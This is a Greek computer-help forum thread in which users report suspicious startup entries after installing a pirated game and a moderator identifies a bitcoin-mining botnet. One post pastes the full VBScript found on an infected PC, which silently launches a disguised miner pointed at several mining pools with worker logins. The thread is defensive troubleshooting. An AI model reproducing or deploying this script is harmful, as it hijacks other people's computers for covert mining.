RedPanda Δημοσ. 9 Ιανουαρίου 2013 Δημοσ. 9 Ιανουαρίου 2013 Καλησπέρα, Βρήκα στο msconfig πως ξεκινάει ένα "win32.exe" από unknown manufacturer με command "C:\Kernels\drivers.vbs" C:\win32.exe Να ανησυχώ ?
antonl Δημοσ. 9 Ιανουαρίου 2013 Δημοσ. 9 Ιανουαρίου 2013 Ε, καλό δεν το κόβω να είναι. Τρέξε κανα antimalware. 1
RedPanda Δημοσ. 9 Ιανουαρίου 2013 Μέλος Δημοσ. 9 Ιανουαρίου 2013 αν τρέχεις windows 7 (64) κάνε ένα κόπο και δες αν τυχαίνει να έχεις τίποτα τέτοιο (πρέπει να εμφανίσεις system files) τα "συμπτώματα" που αντιμετώπισε ο υπολογιστής μου είναι... παράσιτα ! τα ηχεία μου έκαναν ένα περίεργο θόρυβο σαν παράσιτα. έκανα reboot και απενεργοποίησα μερικά πράγματα από το msconfig και δεν ξέρω αν για τα παράσιτα (που σταμάτησαν) ευθυνόταν το εν λόγο αρχείο
antonl Δημοσ. 9 Ιανουαρίου 2013 Δημοσ. 9 Ιανουαρίου 2013 Δεν είμαι σε Win7 αλλά τέτοιο αρχείο δεν υπάρχει ούτε σε Win7. Κάνε ένα scan. Αμφιβάλω λίγο αν προκαλεί όμως παράσιτα το συγκεκριμένο Trojan αλλά μπορεί να κάνω και λάθος.
RedPanda Δημοσ. 9 Ιανουαρίου 2013 Μέλος Δημοσ. 9 Ιανουαρίου 2013 οκ είναι σίγουρα virus ή trojan γιατί φτιάχτηκε χθες που έβαλα πειρατικό το black ops 2 (δέχομαι συγχαρητήρια) αλλά χωρίς πλάκα άνοιξα το pc και είχα παράσιτα σχετικά δυνατά. παίζει να είναι το πιο περίεργο πρόβλημα που έχω δει εδώ και χρόνια !
micos000 Δημοσ. 9 Ιανουαρίου 2013 Δημοσ. 9 Ιανουαρίου 2013 Προσπάθησε να βρεις το drivers.vbs αρχείο και κάνε δεξί κλικ->επεξεργασία. Μην φοβάσαι, δεν μολύνεσαι έτσι. Το vbs είναι script της vb. Κάνε copy-paste τα περιεχόμενα του σε επόμενο post να δούμε τι ακριβώς κάνει. Πάντως το win32.exe δεν μου αρέσει και δεν είναι συνηθισμένο να τρέχει κάποιο εκτελέσιμο χύμα από τον C:
ursutiti Δημοσ. 30 Νοεμβρίου 2013 Δημοσ. 30 Νοεμβρίου 2013 afto eine sto diko mou - drivers.vbs eine sto C:\Kernels/drivers.vbs Const HIDDEN_WINDOW = 12 strComputer = "."Set objWMIService = GetObject("winmgmts:" _ & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2")Set objStartup = objWMIService.Get("Win32_ProcessStartup") Set objConfig = objStartup.SpawnInstance_objConfig.ShowWindow = HIDDEN_WINDOWSet objProcess = GetObject("winmgmts:root\cimv2:Win32_Process")errReturn = objProcess.Create("C:/Kernels/driver/explorer.exe -o http://api2.bitcoin.cz:8332 -u noodlies.worker1 -p 12345 -o http://mine.btcguild.com:8332 -u ntoulapboy_1 -p 123 -o http://us2.eclipsemc.com:8337 -u mcntoulapas_slaves -p 123434 -o http://btcmine.com:8332 -u ntoulapas@ntoulapas -p 1234 -I d", null, objConfig, intProcessID)
Moderators Gi0 Δημοσ. 30 Νοεμβρίου 2013 Moderators Δημοσ. 30 Νοεμβρίου 2013 Βitcoin miner. Εχουν γινει πολλοι οι "εξυπνοι" Ελληνες που προσπαθουν να δημιουργησουν bitcoin mining botnets. Με τον πλεον τραγικο τροπο οπως ειναι ξεκαθαρο και απο το "l33t" vbs. Ενας αντιστοιχος πριν απο μερικους μηνες ειχε την ατυχια να χρειαστει να καθαρισω τον miner του απο καποια pc. Το οποιο εξελιχθηκε πολυ διαφορετικα απ οτι περιμενε ο ιδιος. @ursutiti Φανταζομαι τον καθαρισες. Βtw σε τετοιες περιπτωσεις ειναι πολυ πιθανο να εχουμε χαμηλο ή ακομα και μηδενικο detection rate απο AV, antimalware, κλπ. Περα απο οποιαδηποτε scanning κανετε, ελεγχετε παντα και χειροκινητα.
micos000 Δημοσ. 30 Νοεμβρίου 2013 Δημοσ. 30 Νοεμβρίου 2013 yparxw22!!! Αυτό θα πει πλεονεξία. Το ss με το usb είναι από το insomnia έτσι; Νομίζω ότι το είδα πρόσφατα.
Moderators Gi0 Δημοσ. 30 Νοεμβρίου 2013 Moderators Δημοσ. 30 Νοεμβρίου 2013 yparxw22!!! Αυτό θα πει πλεονεξία. Το ss με το usb είναι από το insomnia έτσι; Νομίζω ότι το είδα πρόσφατα. Yeap, χρηστης και του insomnia. Προφανως ο συγκεκριμενος λογαριασμος δεν εχει κινηση εδω και καιρο και ειμαι σιγουρος πως δεν θα αποκτησει και ποτέ ξανα. Αυτο δεν σημαινει πως δεν κανει βολτες αναμεσα μας
tinaaa Δημοσ. 5 Φεβρουαρίου 2014 Δημοσ. 5 Φεβρουαρίου 2014 Καλησπέρα Αντιμετωπίζω κι εγώ κάτι παρόμοιο, το οποίο το ανακάλυψα γιατί κάθε φορά που αντιγράφω κάτι στο usb μου, αυτό γίνεται συντόμευση... Στην εκκίνηση βρήκα αυτό: wscript.exe //B "C:\Users\myuser\AppData\Roaming\SysDrives.vbs" αλλά κανένα antivirus (δοκίμασα αρκετά) δεν βρήκε τίποτα. Αρκεί να απενεργοποιήσω το στοιχείο απ' την εκκίνηση και μετά να διαγράψω το αρχείο?? Ευχαριστώ
Moderators Gi0 Δημοσ. 5 Φεβρουαρίου 2014 Moderators Δημοσ. 5 Φεβρουαρίου 2014 Καλησπέρα Αντιμετωπίζω κι εγώ κάτι παρόμοιο, το οποίο το ανακάλυψα γιατί κάθε φορά που αντιγράφω κάτι στο usb μου, αυτό γίνεται συντόμευση... Στην εκκίνηση βρήκα αυτό: wscript.exe //B "C:\Users\myuser\AppData\Roaming\SysDrives.vbs" αλλά κανένα antivirus (δοκίμασα αρκετά) δεν βρήκε τίποτα. Αρκεί να απενεργοποιήσω το στοιχείο απ' την εκκίνηση και μετά να διαγράψω το αρχείο?? Ευχαριστώ Πιθανοτατα ναι, αυτη ειναι η λυση. Πριν το διαγραψεις μπορεις να μου το στειλεις μεσω pm? (βαλτο σε ενα rar και ανεβασε το σε καποιο filesharing site)
micos000 Δημοσ. 5 Φεβρουαρίου 2014 Δημοσ. 5 Φεβρουαρίου 2014 Κι εγώ θα ήθελα να το δω. Μπορεί το σκριπτάκι αυτό τρέχει και τίποτα άλλο και να μολύνει και με άλλους τρόπους τον υπολογιστή. Προτείνω έναν έλεγχο και καθαρισμό με το adwcleaner και το malwarebytes.
tinaaa Δημοσ. 5 Φεβρουαρίου 2014 Δημοσ. 5 Φεβρουαρίου 2014 Οκ! To malwarebytes το δοκίμασα, αλλά δε βρήκε κάτι. Μόνο το hitmanpro μου βρήκε κάτι ύποπτο στο wscript.exe αλλά έκανε επιδιόρθωση χωρίς να αλλάξει κάτι..
Moderators Gi0 Δημοσ. 5 Φεβρουαρίου 2014 Moderators Δημοσ. 5 Φεβρουαρίου 2014 Θα υπενθυμισω πως εαν καποιο/καποια antivirus/antimalware μας ενημερωνουν πως δεν εντοπισαν κατι, δεν σημαινει πως οντως ειμαστε "καθαροι". Το ιδιο συνεβει και με το malware και την ολη ιστορια το link της οποια δινω στο #8 (συμπεριλαμβανομενου του malwarebytes, του eset και μπολικων ακομα antivirus/antimalware). To συγκεκριμενο VBS εχει πολυ χαμηλο detection rate (4/50), με το Κaspersky και το Dr Web να το εντοπιζουν. Οκ! To malwarebytes το δοκίμασα, αλλά δε βρήκε κάτι. Μόνο το hitmanpro μου βρήκε κάτι ύποπτο στο wscript.exe αλλά έκανε επιδιόρθωση χωρίς να αλλάξει κάτι.. Δοκιμασε το link απο το forum του Avast που σου εδωσα και στο pm. Στο οποιο ολως τυχαιως Ελληνας εχει και παλι το προβλημα..
Προτεινόμενες αναρτήσεις
Δημιουργήστε ένα λογαριασμό ή συνδεθείτε για να σχολιάσετε
Πρέπει να είστε μέλος για να αφήσετε σχόλιο
Δημιουργία λογαριασμού
Εγγραφείτε με νέο λογαριασμό στην κοινότητα μας. Είναι πανεύκολο!
Δημιουργία νέου λογαριασμούΣύνδεση
Έχετε ήδη λογαριασμό; Συνδεθείτε εδώ.
Συνδεθείτε τώρα